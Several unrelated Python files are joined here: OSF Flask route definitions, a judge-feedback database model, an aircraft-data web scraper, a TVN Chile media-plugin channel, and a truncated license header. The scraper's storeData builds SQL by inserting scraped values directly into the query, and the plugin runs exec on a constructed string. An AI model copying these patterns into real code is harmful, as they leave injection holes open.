OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
Rule(
'/settings/tokens/<_id>/',
'get',
profile_views.personal_access_token_detail,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
# TODO: Uncomment once outstanding issues with this feature are addressed
# Rule(
# '/@<twitter_handle>/',
# 'get',
# profile_views.redirect_to_twitter,
# OsfWebRenderer('error.mako', render_mako_string, trust=False)
# ),
])
# API
process_rules(app, [
Rule('/profile/', 'get', profile_views.profile_view, json_renderer),
Rule('/profile/', 'put', profile_views.update_user, json_renderer),
Rule('/resend/', 'put', profile_views.resend_confirmation, json_renderer),
Rule('/profile/<uid>/', 'get', profile_views.profile_view_id, json_renderer),
# Used by profile.html
Rule('/profile/<uid>/edit/', 'post', profile_views.edit_profile, json_renderer),
Rule('/profile/<uid>/public_projects/', 'get',
profile_views.get_public_projects, json_renderer),
Rule('/profile/<uid>/public_components/', 'get',
profile_views.get_public_components, json_renderer),
Rule('/profile/<user_id>/summary/', 'get',
profile_views.get_profile_summary, json_renderer),
Rule('/user/<uid>/<pid>/claim/email/', 'post',
project_views.contributor.claim_user_post, json_renderer),
Rule(
'/profile/export/',
'post',
profile_views.request_export,
json_renderer,
),
Rule(
'/profile/deactivate/',
'post',
profile_views.request_deactivation,
json_renderer,
),
Rule(
[
'/profile/gravatar/',
'/users/gravatar/',
'/profile/gravatar/<size>',
'/users/gravatar/<size>',
],
'get',
profile_views.current_user_gravatar,
json_renderer,
),
Rule(
[
'/profile/<uid>/gravatar/',
'/users/<uid>/gravatar/',
'/profile/<uid>/gravatar/<size>',
'/users/<uid>/gravatar/<size>',
],
'get',
profile_views.get_gravatar,
json_renderer,
),
# Rules for user profile configuration
Rule('/settings/names/', 'get', profile_views.serialize_names, json_renderer),
Rule('/settings/names/', 'put', profile_views.unserialize_names, json_renderer),
Rule('/settings/names/impute/', 'get', profile_views.impute_names, json_renderer),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'get',
profile_views.serialize_social,
json_renderer,
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'get',
profile_views.serialize_jobs,
json_renderer,
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'get',
profile_views.serialize_schools,
json_renderer,
),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'put',
profile_views.unserialize_social,
json_renderer
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'put',
profile_views.unserialize_jobs,
json_renderer
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'put',
profile_views.unserialize_schools,
json_renderer
),
], prefix='/api/v1',)
### Search ###
# Web
process_rules(app, [
Rule(
'/search/',
'get',
{},
OsfWebRenderer('search.mako', trust=False)
),
Rule(
'/share/',
'get',
{},
OsfWebRenderer('share_search.mako', trust=False)
),
Rule(
'/share/registration/',
'get',
{'register': settings.SHARE_REGISTRATION_URL},
OsfWebRenderer('share_registration.mako', trust=False)
),
Rule(
'/share/help/',
'get',
{'help': settings.SHARE_API_DOCS_URL},
OsfWebRenderer('share_api_docs.mako', trust=False)
),
Rule( # FIXME: Dead route; possible that template never existed; confirm deletion candidate with ErinB
'/share_dashboard/',
'get',
{},
OsfWebRenderer('share_dashboard.mako', trust=False)
),
Rule(
'/share/atom/',
'get',
search_views.search_share_atom,
xml_renderer
),
Rule('/api/v1/user/search/', 'get', search_views.search_contributor, json_renderer),
Rule(
'/api/v1/search/node/',
'post',
project_views.node.search_node,
json_renderer,
),
])
# API
process_rules(app, [
Rule(['/search/', '/search/<type>/'], ['get', 'post'], search_views.search_search, json_renderer),
Rule('/search/projects/', 'get', search_views.search_projects_by_title, json_renderer),
Rule('/share/search/', ['get', 'post'], search_views.search_share, json_renderer),
Rule('/share/stats/', 'get', search_views.search_share_stats, json_renderer),
Rule('/share/providers/', 'get', search_views.search_share_providers, json_renderer),
], prefix='/api/v1')
# Institution
process_rules(app, [
Rule('/institutions/<inst_id>/', 'get', institution_views.view_institution, OsfWebRenderer('institution.mako', trust=False))
])
# Project
# Web
process_rules(app, [
# '/' route loads home.mako if logged in, otherwise loads landing.mako
Rule('/', 'get', website_views.index, OsfWebRenderer('index.mako', trust=False)),
Rule('/goodbye/', 'get', goodbye, OsfWebRenderer('landing.mako', trust=False)),
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'get',
project_views.node.view_project,
OsfWebRenderer('project/project.mako', trust=False)
),
# Create a new subproject/component
Rule(
'/project/<pid>/newnode/',
'post',
project_views.node.project_new_node,
notemplate
),
# # TODO: Add API endpoint for tags
# Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, OsfWebRenderer('tags.mako', trust=False)),
Rule('/project/new/<pid>/beforeTemplate/', 'get',
project_views.node.project_before_template, json_renderer),
Rule(
[
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
],
'get',
project_views.node.node_contributors,
OsfWebRenderer('project/contributors.mako', trust=False),
),
Rule(
[
'/project/<pid>/settings/',
'/project/<pid>/node/<nid>/settings/',
],
'get',
project_views.node.node_setting,
OsfWebRenderer('project/settings.mako', trust=False)
),
# Permissions
Rule( # TODO: Where, if anywhere, is this route used?
[
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
],
'post',
project_views.node.project_set_privacy,
OsfWebRenderer('project/project.mako', trust=False)
),
### Logs ###
# View forks
Rule(
[
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
],
'get',
project_views.node.node_forks,
OsfWebRenderer('project/forks.mako', trust=False)
),
# Registrations
Rule(
[
'/project/<pid>/register/',
'/project/<pid>/node/<nid>/register/',
],
'get',
project_views.register.node_register_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/register/<metaschema_id>/',
'/project/<pid>/node/<nid>/register/<metaschema_id>/',
],
'get',
project_views.register.node_register_template_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'get',
project_views.node.node_registrations,
OsfWebRenderer('project/registrations.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'post',
project_views.drafts.new_draft_registration,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/',
],
'get',
project_views.drafts.edit_draft_registration_page,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
],
'get',
project_views.drafts.draft_before_register_page,
OsfWebRenderer('project/register_draft.mako', trust=False)),
Rule(
[
'/project/<pid>/retraction/',
'/project/<pid>/node/<nid>/retraction/',
],
'get',
project_views.register.node_registration_retraction_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/',
],
'get',
project_views.register.node_registration_retraction_get,
OsfWebRenderer('project/retract_registration.mako', trust=False)
),
Rule(
'/ids/<category>/<path:value>/',
'get',
project_views.register.get_referent_by_identifier,
notemplate,
),
# Statistics
Rule(
[
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
],
'get',
project_views.node.project_statistics_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/analytics/',
'/project/<pid>/node/<nid>/analytics/',
],
'get',
project_views.node.project_statistics,
OsfWebRenderer('project/statistics.mako', trust=False)
),
### Files ###
# Note: Web endpoint for files view must pass `mode` = `page` to
# include project view data and JS includes
# TODO: Start waterbutler to test
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/',
],
'get',
project_views.file.collect_file_trees,
OsfWebRenderer('project/files.mako', trust=False),
view_kwargs={'mode': 'page'},
),
Rule(
[
'/project/<pid>/files/<provider>/<path:path>/',
'/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
'/project/<pid>/files/deleted/<trashed_id>/',
'/project/<pid>/node/<nid>/files/deleted/<trashed_id>/',
],
'get',
addon_views.addon_deleted_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
# Legacy Addon view file paths
'/project/<pid>/<provider>/files/<path:path>/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/',
'/project/<pid>/<provider>/files/<path:path>/download/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/download/',
# Legacy routes for `download_file`
'/project/<pid>/osffiles/<fid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/download/',
# Legacy routes for `view_file`
'/project/<pid>/osffiles/<fid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/download/<fid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/',
'/project/<pid>/files/<fid>/',
'/project/<pid>/node/<nid>/files/<fid>/',
'/project/<pid>/files/download/<fid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/',
# Legacy routes for `download_file_by_version`
'/project/<pid>/osffiles/<fid>/version/<vid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/download/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/files/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/<fid>/version/<vid>/',
'/project/<pid>/files/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
OsfWebRenderer('project/view_file.mako', trust=False),
),
Rule(
[
# api/v1 Legacy routes for `download_file`
'/api/v1/project/<pid>/osffiles/<fid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/',
'/api/v1/project/<pid>/files/download/<fid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/',
#api/v1 Legacy routes for `download_file_by_version`
'/api/v1/project/<pid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/files/download/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
json_renderer
),
])
# API
process_rules(app, [
Rule(
'/email/meeting/',
'post',
conference_views.meeting_hook,
json_renderer,
),
Rule('/mailchimp/hooks/', 'get', profile_views.mailchimp_get_endpoint, json_renderer),
Rule('/mailchimp/hooks/', 'post', profile_views.sync_data_from_mailchimp, json_renderer),
# Create project, used by [coming replacement]
Rule('/project/new/', 'post', project_views.node.project_new_post, json_renderer),
Rule([
'/project/<pid>/contributors_abbrev/',
'/project/<pid>/node/<nid>/contributors_abbrev/',
], 'get', project_views.contributor.get_node_contributors_abbrev, json_renderer),
Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, json_renderer),
Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', project_views.node.view_project, json_renderer),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'get',
project_views.node.get_pointed,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'post',
project_views.node.add_pointers,
json_renderer,
),
Rule(
[
'/pointer/',
],
'post',
project_views.node.add_pointer,
json_renderer,
),
Rule(
[
'/pointers/move/',
],
'post',
project_views.node.move_pointers,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>pointer/',
],
'delete',
project_views.node.remove_pointer,
json_renderer,
),
Rule(
[
'/folder/<pid>/pointer/<pointer_id>',
],
'delete',
project_views.node.remove_pointer_from_folder,
json_renderer,
),
Rule([
'/project/<pid>/get_summary/',
'/project/<pid>/node/<nid>/get_summary/',
], 'get', project_views.node.get_summary, json_renderer),
# TODO: [#OSF-6557] Route "get_children" is deprecated. Use get_readable_descendants.
Rule([
'/project/<pid>/get_children/',
'/project/<pid>/node/<nid>/get_children/',
'/project/<pid>/get_readable_descendants/',
'/project/<pid>/node/<nid>/get_readable_descendants/',
], 'get', project_views.node.get_readable_descendants, json_renderer),
Rule([
'/project/<pid>/get_forks/',
'/project/<pid>/node/<nid>/get_forks/',
], 'get', project_views.node.get_forks, json_renderer),
Rule([
'/project/<pid>/get_registrations/',
'/project/<pid>/node/<nid>/get_registrations/',
], 'get', project_views.node.get_registrations, json_renderer),
# Draft Registrations
Rule([
'/project/<pid>/drafts/',
], 'get', project_views.drafts.get_draft_registrations, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'get', project_views.drafts.get_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'put', project_views.drafts.update_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'delete', project_views.drafts.delete_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/submit/',
], 'post', project_views.drafts.submit_draft_for_review, json_renderer),
# Meta Schemas
Rule([
'/project/drafts/schemas/',
], 'get', project_views.drafts.get_metaschemas, json_renderer),
Rule([
'/project/<pid>/get_contributors/',
'/project/<pid>/node/<nid>/get_contributors/',
], 'get', project_views.contributor.get_contributors, json_renderer),
Rule([
'/project/<pid>/get_contributors_from_parent/',
'/project/<pid>/node/<nid>/get_contributors_from_parent/',
], 'get', project_views.contributor.get_contributors_from_parent, json_renderer),
# Reorder contributors
Rule(
[
'/project/<pid>/contributors/manage/',
'/project/<pid>/node/<nid>/contributors/manage/',
],
'POST',
project_views.contributor.project_manage_contributors,
json_renderer,
),
Rule(
[
'/project/<pid>/contributor/remove/',
'/project/<pid>/node/<nid>/contributor/remove/',
],
'POST',
project_views.contributor.project_remove_contributor,
json_renderer,
),
Rule([
'/project/<pid>/get_editable_children/',
'/project/<pid>/node/<nid>/get_editable_children/',
], 'get', project_views.node.get_editable_children, json_renderer),
# Private Link
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'post', project_views.node.project_generate_private_link_post, json_renderer),
Rule([
'/project/<pid>/private_link/edit/',
'/project/<pid>/node/<nid>/private_link/edit/',
], 'put', project_views.node.project_private_link_edit, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'delete', project_views.node.remove_private_link, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'get', project_views.node.private_link_table, json_renderer),
# Create, using existing project as a template
Rule([
'/project/new/<nid>/',
], 'post', project_views.node.project_new_from_template, json_renderer),
# Update
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'put',
project_views.node.update_node,
json_renderer,
),
# Remove
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'delete',
project_views.node.component_remove,
json_renderer,
),
# Reorder components
Rule('/project/<pid>/reorder_components/', 'post',
project_views.node.project_reorder_components, json_renderer),
# Edit node
Rule([
'/project/<pid>/edit/',
'/project/<pid>/node/<nid>/edit/',
], 'post', project_views.node.edit_node, json_renderer),
# Add / remove tags
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'post', project_views.tag.project_add_tag, json_renderer),
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'delete', project_views.tag.project_remove_tag, json_renderer),
# Add / remove contributors
Rule([
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
], 'post', project_views.contributor.project_contributors_post, json_renderer),
# Forks
Rule(
[
'/project/<pid>/fork/before/',
'/project/<pid>/node/<nid>/fork/before/',
], 'get', project_views.node.project_before_fork, json_renderer,
),
Rule(
[
'/project/<pid>/fork/',
'/project/<pid>/node/<nid>/fork/',
], 'post', project_views.node.node_fork_page, json_renderer,
),
Rule(
[
'/project/<pid>/pointer/fork/',
'/project/<pid>/node/<nid>/pointer/fork/',
], 'post', project_views.node.fork_pointer, json_renderer,
),
# View forks
Rule([
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
], 'get', project_views.node.node_forks, json_renderer),
# Registrations
Rule([
'/project/<pid>/beforeregister/',
'/project/<pid>/node/<nid>/beforeregister',
], 'get', project_views.register.project_before_register, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
], 'post', project_views.drafts.register_draft_registration, json_renderer),
Rule([
'/project/<pid>/register/<template>/',
'/project/<pid>/node/<nid>/register/<template>/',
], 'get', project_views.register.node_register_template_page, json_renderer),
Rule([
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/'
], 'post', project_views.register.node_registration_retraction_post, json_renderer),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'get',
project_views.register.node_identifiers_get,
json_renderer,
),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'post',
project_views.register.node_identifiers_post,
json_renderer,
),
# Statistics
Rule([
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
], 'get', project_views.node.project_statistics, json_renderer),
# Permissions
Rule([
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
], 'post', project_views.node.project_set_privacy, json_renderer),
Rule([
'/project/<pid>/permissions/beforepublic/',
'/project/<pid>/node/<nid>/permissions/beforepublic/',
], 'get', project_views.node.project_before_set_public, json_renderer),
### Watching ###
Rule([
'/project/<pid>/watch/',
'/project/<pid>/node/<nid>/watch/'
], 'post', project_views.node.watch_post, json_renderer),
Rule([
'/project/<pid>/unwatch/',
'/project/<pid>/node/<nid>/unwatch/'
], 'post', project_views.node.unwatch_post, json_renderer),
Rule([
'/project/<pid>/togglewatch/',
'/project/<pid>/node/<nid>/togglewatch/'
], 'post', project_views.node.togglewatch_post, json_renderer),
# Combined files
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/'
],
'get',
project_views.file.collect_file_trees,
json_renderer,
),
# Endpoint to fetch Rubeus.JS/Hgrid-formatted data
Rule(
[
'/project/<pid>/files/grid/',
'/project/<pid>/node/<nid>/files/grid/'
],
'get',
project_views.file.grid_data,
json_renderer
),
# Settings
Rule(
'/files/auth/',
'get',
addon_views.get_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/waterbutler/logs/',
'/project/<pid>/node/<nid>/waterbutler/logs/',
],
'put',
addon_views.create_waterbutler_log,
json_renderer,
),
Rule(
[
'/registration/<pid>/callbacks/',
],
'put',
project_views.register.registration_callbacks,
json_renderer,
),
Rule(
'/settings/addons/',
'post',
profile_views.user_choose_addons,
json_renderer,
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
json_renderer,
),
Rule(
'/settings/notifications/',
'post',
profile_views.user_choose_mailing_lists,
json_renderer,
),
Rule(
'/subscriptions/',
'get',
notification_views.get_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/subscriptions/',
'/project/<pid>/node/<nid>/subscriptions/'
],
'get',
notification_views.get_node_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/tree/',
'/project/<pid>/node/<nid>/tree/'
],
'get',
project_views.node.get_node_tree,
json_renderer,
),
Rule(
'/subscriptions/',
'post',
notification_views.configure_subscription,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/addons/',
'/project/<pid>/node/<nid>/settings/addons/',
],
'post',
project_views.node.node_choose_addons,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/comments/',
'/project/<pid>/node/<nid>/settings/comments/',
],
'post',
project_views.node.configure_comments,
json_renderer,
),
# Invite Users
Rule(
[
'/project/<pid>/invite_contributor/',
'/project/<pid>/node/<nid>/invite_contributor/'
],
'post',
project_views.contributor.invite_contributor_post,
json_renderer
)
], prefix='/api/v1')
# Set up static routing for addons
# NOTE: We use nginx to serve static addon assets in production
addon_base_path = os.path.abspath('website/addons')
if settings.DEV_MODE:
@app.route('/static/addons/<addon>/<path:filename>')
def addon_static(addon, filename):
addon_path = os.path.join(addon_base_path, addon, 'static')
return send_from_directory(addon_path, filename)
|
from datetime import datetime
from enum import Enum
from json import dumps
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy_utils import ChoiceType as EnumType
db = SQLAlchemy()
class JudgeStatus(Enum):
PENDING = 0
STARTED = 1
FAILED = 2
FINISHED = 3
class JudgeFeedback(db.Model):
__tablename__ = "feedback"
filename = db.Column(db.String(36), primary_key=True) # TODO: UUID
cur_idx = db.Column(db.Integer, default=0)
max_idx = db.Column(db.Integer, nullable=False)
status = db.Column(
EnumType(
JudgeStatus,
impl=db.Integer(),
),
default=JudgeStatus['PENDING'],
)
cur_json_idx = db.Column(db.Integer, default=0)
expected_output = db.Column(db.String(1024), nullable=True)
actual_output = db.Column(db.String(1024), nullable=True)
created = db.Column(db.DateTime, default=datetime.now)
updated = db.Column(db.DateTime, nullable=False)
def __setattr__(self, key, value):
super().__setattr__(key, value)
super().__setattr__('updated', datetime.now())
def __str__(self):
output = {}
for key in self.__dict__:
if key[0] == '_':
pass
elif key in ('updated', 'created', 'status'):
output[key] = str(getattr(self, key))
elif key in ('expected_output', 'actual_output'):
value = getattr(self, key)
if value is not None:
output[key] = value # XXX: JudgeFeedback._Brrrrify(value)
else:
value = getattr(self, key)
if value is not None:
output[key] = value
return dumps(output, sort_keys=True, indent=2)
@staticmethod
def _Brrrrify(inputs, before='\n', after='<br>', ignores=('\r',)):
"""please god save us."""
inputs = list(inputs)
while inputs.count(before):
inputs[inputs.index(before)] = after
for ign in ignores:
while inputs.count(ign):
inputs.remove(ign)
return ''.join(inputs)
def monkeypatch_db_celery(app, celery):
"""Let Celery can change the content of DB with App context."""
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
|
"""
Module for harvesting data from the
Gatwick Aviation Society (GAS) aircraft database
DO NOT USE
"""
# Imports
import requests
from bs4 import BeautifulSoup
from db.pghandler import Connection
# Constants
GAS_URL = "http://www.gatwickaviationsociety.org.uk/modeslookup.asp"
GAS_FIELDS = {"Registration": "registration",
"DICAOType": "icaotype",
"DType": "type",
"DSerial": "serial",
"DOperator": "operator",
"DICAOOperator": "icaooperator",
"DSubOperator": "suboperator"}
def downloadGASPage(icao24):
"""
Search the GAS db for a specific transponder code
:param icao24: The ICAO24 Mode S transponder code
:return: The response object
"""
data = {"MSC": icao24,
"Submit2": "Find"}
for key in GAS_FIELDS:
data[key] = ""
headers = {"Host": "www.gatwickaviationsociety.org.uk",
"Accept": "text/static,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://www.gatwickaviationsociety.org.uk/modeslookup.asp"}
r = requests.post(GAS_URL, headers=headers, data=data)
return r
def getMissingICAO24Codes():
"""
Create a list of codes not yet included in the aircraft database
:return: A list if ICAO24 Mode S transponder codes
"""
sql = "SELECT icao24 FROM aircraft WHERE registration IS NULL"
with Connection() as con:
codes = [code[0] for code in con.selectAll(sql)]
return codes
def extractData(rawtext):
"""
extract values from raw HTML
:param rawtext: The text to extract from
:return: a dictionary with the GAS keys and values found in the HTML
"""
soup = BeautifulSoup(rawtext, "lxml")
values = {}
for key in GAS_FIELDS:
value = soup.find("input", id=key)
values[key] = value["value"]
return values
def storeData(icao24, data):
"""
Store aircraft data into the database
:param icao24: The ICAO24 Mode S transponder code
:param data: Dictionary with corresponding data
:return:
"""
values = ""
for key in GAS_FIELDS:
name = GAS_FIELDS[key]
value = data[key]
if value == '' and key != "Registration":
value = "NULL"
else:
value = "'%s'" % value
values += "%s=%s," % (name, value)
values = values[:-1]
sql = "UPDATE aircraft SET %s WHERE icao24='%s'" % (values, icao24)
with Connection(autocommit=True) as con:
con.execute(sql)
def harvestGAS():
"""
GAS Harvest Base function, for use in bot.app.main
:return: A dictionary with keys success (boolean) and message (string)
"""
codes = getMissingICAO24Codes()
if len(codes) > 0:
code = codes[0]
r = downloadGASPage(code)
data = extractData(r.text)
storeData(code, data)
if data["Registration"] == "Not Found":
message = "No aircraft found for ICAO24 code %s" % code
else:
message = "Aircraft %s found for ICAO24 code %s." % (data["Registration"], code)
result = {"success": True,
"message": message}
return result
else:
result = {"success": True,
"message": "All aircraft already stored in database."}
return result
if __name__ == "__main__":
harvestGAS()
|
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# tvalacarta - XBMC Plugin
# Canal para TVN (Chile)
# http://blog.tvalacarta.info/plugin-xbmc/tvalacarta/
#------------------------------------------------------------
import urlparse,re
import urllib
from core import logger
from core import config
from core import scrapertools
from core.item import Item
DEBUG = False
CHANNELNAME = "tvn"
def isGeneric():
return True
def mainlist(item):
logger.info("tvalacarta.channels.tvn mainlist")
itemlist = []
itemlist.append( Item(channel=CHANNELNAME, title="Teleseries" , action="programas" , url="http://www.tvn.cl/player/", extra="teleseries", folder=True) )
itemlist.append( Item(channel=CHANNELNAME, title="Entretención" , action="programas" , url="http://www.tvn.cl/player/", extra="entretencion", folder=True) )
itemlist.append( Item(channel=CHANNELNAME, title="Series" , action="programas" , url="http://www.tvn.cl/player/", extra="series", folder=True) )
itemlist.append( Item(channel=CHANNELNAME, title="Docurrealidad" , action="programas" , url="http://www.tvn.cl/player/", extra="docurrealidad", folder=True) )
itemlist.append( Item(channel=CHANNELNAME, title="Cultura" , action="programas" , url="http://www.tvn.cl/player/", extra="cultura", folder=True) )
return itemlist
def programas(item):
logger.info("tvalacarta.channels.tvn programas")
itemlist = []
#http://www.tvn.cl/cultura/menuportadaplayer/?service=blank
# Extrae las series
data = scrapertools.cachePage("http://www.tvn.cl/"+item.extra+"/menuportadaplayer/?service=blank")
logger.info("data="+data.strip())
patron = '<li><a href="([^"]+)">([^<]+)<'
matches = re.compile(patron,re.DOTALL).findall(data)
if DEBUG: scrapertools.printMatches(matches)
for scrapedurl,scrapedtitle in matches:
title = scrapedtitle.strip()
thumbnail = ""
plot = ""
url = urlparse.urljoin(item.url,scrapedurl)
if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]")
itemlist.append( Item( channel=item.channel , title=title , action="episodios" , url=url , thumbnail=thumbnail , plot=plot , show=title , fanart=thumbnail , folder=True ) )
return itemlist
def episodios(item):
logger.info("tvalacarta.channels.tvn episodios")
itemlist=[]
'''
<article class="ventana3 efecto-hover">
<img src="http://www.tvn.cl/incoming/article566557.ece/ALTERNATES/w300/cumbres_170313.jpg" alt="Lhasa la ciudad prohibida"/>
<a href="/player/play/?id=566567&s=8959">
<div class="mask">
<h5><span></span>Cumbres del Mundo</h5>
<h3>Capítulo 11</h3>
<h2>Lhasa la ciudad prohibida</h2>
</div>
</a>
</article>
'''
# Extrae los episodios
data = scrapertools.cachePage(item.url)
patron = '<article class="ventana3 efecto-hover"[^<]+'
patron += '<img src="([^"]+)"[^<]+'
patron += '<a href="([^"]+)"[^<]+'
patron += '<div class="mask"[^<]+'
patron += '<h5><span></span>([^<]+)</h5[^<]+'
patron += '<h3>([^<]+)</h3[^<]+'
patron += '<h2>([^<]+)</h2>'
matches = re.compile(patron,re.DOTALL).findall(data)
if DEBUG: scrapertools.printMatches(matches)
for scrapedthumbnail,scrapedurl,scrapedshow,scrapedepisode,scrapedtitle in matches:
title = scrapedepisode.strip()+" - "+scrapedtitle.strip()
thumbnail = urlparse.urljoin(item.url,scrapedthumbnail)
plot = ""
url = urlparse.urljoin(item.url,scrapedurl)
if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]")
itemlist.append( Item( channel=item.channel , title=title , action="play" , server="tvn" , url=url , thumbnail=thumbnail , plot=plot , show=title , fanart=thumbnail , folder=False ) )
return itemlist
# Verificación automática de canales: Esta función debe devolver "True" si todo está ok en el canal.
def test():
# El canal tiene estructura
items_mainlist = mainlist(Item())
items_programas = []
# Todas las opciones del menu tienen que tener algo
for item_mainlist in items_mainlist:
exec "itemlist="+item_mainlist.action+"(item_mainlist)"
if len(itemlist)==0:
print "La sección '"+item_mainlist.title+"' no devuelve nada"
return False
items_programas = itemlist
# Ahora recorre los programas hasta encontrar vídeos en alguno
for item_programa in items_programas:
print "Verificando "+item_programa.title
items_episodios = episodios(item_programa)
if len(items_episodios)>0:
return True
print "No hay videos en ningún programa"
return False
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
